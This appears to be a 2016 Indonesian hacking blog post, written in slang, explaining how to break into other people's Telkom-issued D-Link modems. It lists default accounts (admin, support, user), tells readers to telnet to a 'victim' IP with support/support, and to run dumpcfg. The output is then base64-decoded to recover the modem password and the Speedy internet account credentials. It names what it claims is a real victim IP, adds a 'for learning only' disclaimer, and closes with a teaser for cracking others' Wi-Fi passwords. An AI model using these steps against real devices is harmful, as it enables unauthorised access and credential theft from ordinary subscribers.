Selasa, 04 Oktober 2016

Hacking Pass Admin dan Akun Telkom via telnet (untuk modem D-Link)

   Beribu macam inovasi Telkom untuk memberikan kemudahan dan kenyamanan kita dalam berseluncur di dunia maya, tak pelak faktor-faktor sekuritas kadang sedikit terabaikan, kita ambil saja contoh penanaman 3 user default yang ditanamkan dengan tujuan memudahkan pihak Telkom untuk mensetting modem Pengguna via remote access ketika ada trouble.

3 User default yang ditanamkan  ( untuk modem Tp-Link & D-Link ) adalah :
          User:  Admin password: admin
          User:  Support password: support
          User:  User password: user


  Udahan ah bahasa formalnya, langsung aja ke pokok bahasan yang sesuai judul =))

Alat dan bahan : 
  • Computer / PC / Laptop
  • Koneksi Internet
  • IP Korban
Persiapan         :
 Kalo pake Windows XP gak perlu persiapan :D, karena XP udah mo expired, kita bakal bahas pake win 7 atau 8.

Pertama, aktifkan fitur telnet terlebih dahulu, caranya masuk ke Control Panel >
                            Uninstall Program  > Turn Windows Features on or off, trus bakal muncul dialog box,
                            centang Telnet Client   dan Telnet Server trus OK in aja (tunggu ampe proses selesai).

Kalau agak bingung, ni gambarnya :


Control panel cuy, ntar klik yang ada tanda panah merahnya,...Control panel cuy, ntar klik yang ada tanda panah merahnya,...
nah, kalo udah begini bentuknya, klik lagi cuy yg ada tanda merah panahnya...nah, kalo udah begini bentuknya, klik lagi cuy yg ada tanda merah panahnya...
nah kalo udah keluar dialog box, cari ampe ketemu tulisan yang seperti dipanah cuy, centang dua-duanya, trus OK dah (y)nah kalo udah keluar dialog box, cari ampe ketemu tulisan yang seperti dipanah cuy, centang dua-duanya, trus OK dah (y)


Siapkan IP korban, atau bisa pake IP ini 36.81.158.150 ( baru dapet setengah jam sebelum ane nulis ini )
buka di browser, User:admin Password:admin (pasti nggak bisa, coz default passnya udah dirubah :P)

kalo gitu buka command promt (cmd) aja yok,....
cara paling mudah, tekan logo Windows ama huruf R di kibot :D, trus ketik cmd, abis tuh tekan Enter.


kalo udah kluar black box/ kotak hitam ( kek pesawat aja ada kotak hitamnya :D), ketik :

telnet 36.81.158.150    < IP Korban




trus enter, maka bakal kluar perintah login, masukkkan
login: support
password: support

(ketika kita mengetik password, ketikan kita tidak akan nampak, jadi, ketik aja, trus enter pokoknya)


kemudian tekan enter, setelah itu ketik dumpcfg lalu enter lagi, maka akan keluar beginian:




taraaaaaaaaaaaaaaaaa,.....
pada lingkaran merah I adalah user dan password modem, dan pada lingkaran merah II adalah akun dan password speedy nya :D, tinggal di decode aja pake base64 decoder (kalo gak tau apa itu base64, apa itu encode decode, mending gantung diri aja, gak usah belajar beginian :S)


Selamat mencoba,...

Salam,


Bamboong_Elite


*tutorial ini hanyalah untuk pembelajaran semata, ane gak bertanggung jawab atas apapun pokoknya :D

Cara Membobol Password Hotspot/Wifi Orang Lain

Cara Membobol Password Wifi Cara Membobol Password Orang Lain  memang banyak sekali caranya teman-teman, mulai dari teknik sniff...